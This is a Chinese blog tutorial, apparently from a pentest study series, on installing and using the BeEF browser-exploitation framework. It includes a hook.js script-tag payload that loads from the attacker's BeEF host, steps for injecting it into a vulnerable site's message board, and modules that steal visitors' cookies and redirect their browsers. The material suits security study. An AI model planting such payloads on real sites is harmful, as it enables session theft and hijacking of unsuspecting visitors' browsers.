XSS攻击(5), beef-xss 平台

已于 2023-10-21 15:25:54 修改
阅读量368 收藏
点赞数
分类专栏: 渗透测试-web漏洞 文章标签: xss 前端
于 2023-10-21 15:25:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bua200720411091/article/details/133961701
版权

beef-xss 平台

这是一个利用XSS注入木马来监听和控制用户浏览器的工具.
新版的kali中可能没有内置这个工具了.

一, 安装

sudo apt install beef-xss

安装过程中需要设置登录密码, 默认账户:beef.

后面也可以通过配置文件修改账户和密码:

/usr/share/beef-xss/config.yaml

安装成功后会给出一个url, 用浏览器访问beef登录页面:

http://127.0.0.1:3000/ui/panel

默认任何ip都可以访问beef平台页面. 所以也可以使用远程访问:
192.168.112.201是beef安装所在的主机.

http://192.168.112.201:3000/ui/panel

Log:
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

这里显示了平台主页地址, 以及Hook木马的标签, 这个标签用于注入网站:
<script src="http://127.0.0.1:3000/hook.js"></script>

二, 测试demo页面

beef自带了两个测试页面, 这俩个页面是已经注入过的带有木马的页面:

http://192.168.112.201:3000/demos/basic.html
http://192.168.112.201:3000/demos/butcher/index.html

打开木马测试页面后, 浏览器就处于被控制状态, 可以回到beef平台中进一步操作.

三, 使用beef平台

进入beef平台主页面并登录.

左侧是被控制主机的目录, 右侧显示具体的操作:
Current Browser 界面显示用户的浏览器信息.
Details界面的内容包括 时间, 浏览器版本, cookie, 操作系统版本, cpu/gpu版本等.
Commands界面控制用户的浏览器执行各种命令.

1. 命令颜色:
绿色: 命令模块可以在目标浏览器上运行,且用户不会感到任何异常
橙色: 命令模块可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转 等)
灰色: 命令模块尚未针对此目标进行验证,即不知道能否可运行
红色: 命令模块不适用于此目标
2. 执行命令:

选择<Get Cookie>, 点击右下角的Execute按钮执行即可控制用户的浏览器获取cookie.
选择<Redirect Browser>, 控制用户的浏览器重定向到其他url.

3. 植入木马

测试过demo页面有效之后, 可以将木马植入到具有XXS漏洞的主机测试.

打开目标网站存在XSS漏洞的位置, 将木马注入提交. 比如注入到留言板中.

木马标签中的地址需要替换为beef控制平台所在的ip:
<script src="http://192.168.112.201:3000/hook.js"></script>

注入成功后, 所有来访问木马网站的用户浏览器将被beef平台记录和控制.

回到beef平台, 在左侧即可看到被控制的木马网站, 以及访问它的用户.
凡是访问木马网站的用户, 浏览器每隔1秒会向beef控制平台发送数据, 保持监视.

DeltaTime
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
xss测试语句大全--5000条
03-24
xss测试语句---5000条
web安全中使用beef工具自动化xss攻击流程
qq_63539335的博客
01-30 605
web安全中使用beef工具实现自动化xss攻击
beef xss 查看及修改默认登录密码
qq_42078965的博客
10-01 7571
beef xss 查看及修改默认登录密码 正常情况下,默认beef帐号和密码均为:beef ,但偏偏自己什么时候改了,自己忘记了。所以找回自己修改过的密码: 共分为3个步骤: 1.找到配置密码的文件; 2.查看自己修改的密码(或修改新的密码); 3.重新登录; 实施: 1.找到配置密码的文件(kali默认在/usr/share/beef-xss/config.yaml中); vi /usr/share/beef-xss/config.yaml 2.查看自己修改的密码(或修改密码),大概第8行左右; 3.
beef工具-01】神器beef的安装与简介
m0_64378913的博客
06-01 7119
目录1 beef概述1 beef简介1.2 beef2 beef安装3 beef的重要网址4 简单测试5 总结参考文章 1 beef概述 1 beef简介 BeEF 是浏览器开发框架的缩写。 它是一款专注于网络浏览器的渗透测试工具。 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。 与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器。
beef-xss忘记密码
lin152235的博客
08-04 994
*BeEF-XSS:**是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能!启动BeFF-XSS BeEF-XSS管理登录页面 用户名默认beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器)4.如果修改了config.yaml文件 就需要重启beef-xss。...
Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)
网络安全领域___专研者.
03-18 3857
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Martin-share的博客
02-12 9386
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
kali下安装beef-xss
qq_63261741的博客
04-14 377
【代码】kali下安装beef-xss
kali虚拟机“忘记BeEF账号密码(权限不足问题)”之查看账号密码BeEF的基本启动和使用,Hook使用方法及相关机器信息查看和命令使用
01-29 3430
kali虚拟机“忘记BeEF账号密码(权限不足问题)”之查看账号密码BeEF的基本启动和使用,Hook使用方法及相关机器信息查看和命令使用
beef利用xss漏洞实现攻击
m0_61506558的博客
08-22 1106
beef是一个XSS平台,有非常多的功能Exploit 模块用的最多,但初学者用Browser就足够了Beef-XSS平台基本使用 https://www.bilibili.com/video/av92711691/
XSS发生的位置-01
09-15
XSS发生的位置-01
存储型XSS灰盒测试-01
最新发布
09-15
存储型XSS灰盒测试-01
Beef-xss安装及使用
qq_40624810的博客
12-10 7324
一、背景 BeEF是The Browser Exploitation Framework的缩写。它是一种专注于Web浏览器的渗透测试工具。 随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了强化的网络边界和客户端系统,并在一个开放的环境中检查可利用性:Web浏览器。BeEF将挂钩一个或多个Web浏览器,并将它们用作启动定向命令模块以及从浏览器上下文中对系统进一步攻击的滩头阵地。 BeEF
【渗透测试工具beefXSS渗透测试工具beef如何安装使用?
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
04-25 7209
目录 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码,登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110,访问这个页面,就会被beef勾住,浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗,获取用户名和密码 .
xss-工具-Beef-Xss安装以及使用
weixin_44257023的博客
07-24 5843
xss-工具-Beef-Xss安装以及使用
kali,beef-xss安装及使用
m0_73581247的博客
06-22 1484
1.Beef工具 1.1 Beef工具介绍   Beef是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; Beef是基于Ruby语言编写的,并且支持图形化界面,操作简单。   新版的kail已经不自带beef工具了,需要自己下载。并且目前只支持macos和Linux系统。1.2 Beef工具安装   在安装beef工具之前建议更新一下源   apt-get update   apt-get install beef-xss 时间比较久,可以去放松一会   启
BeEF-XSS详细使用教程
一个懒鬼的博客
05-10 6383
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS 关于kali没有安装beef可以参考下图: BeEF-XSS管理登录页面 用户名默认beef密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览..
xss攻击 beef
09-06
XSS攻击是一种跨站脚本攻击,它利用网页应用程序对用户输入的信任来注入恶意的客户端脚本。而beef则是一种用于进行XSS攻击平台beef-xssbeef平台的一部分,它允许攻击者在受害者的浏览器中执行恶意代码。 使用beef-xss进行XSS攻击需要在Kali上安装beef-xss工具,并输入"beef-xss"命令来获取恶意代码。如果没有安装beef,需要先进行安装,并按照提示一直输入"y"进行安装。 在进行XSS攻击之前,建议先了解XSS的基本知识和攻击原理。可以参考引用中的实验目的和实验内容,以及引用中提供的Beef-XSS平台基本使用视频。beef平台有很多功能模块,其中Exploit模块是最常用的,但对于初学者来说,使用Browser模块就足够了。 <span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值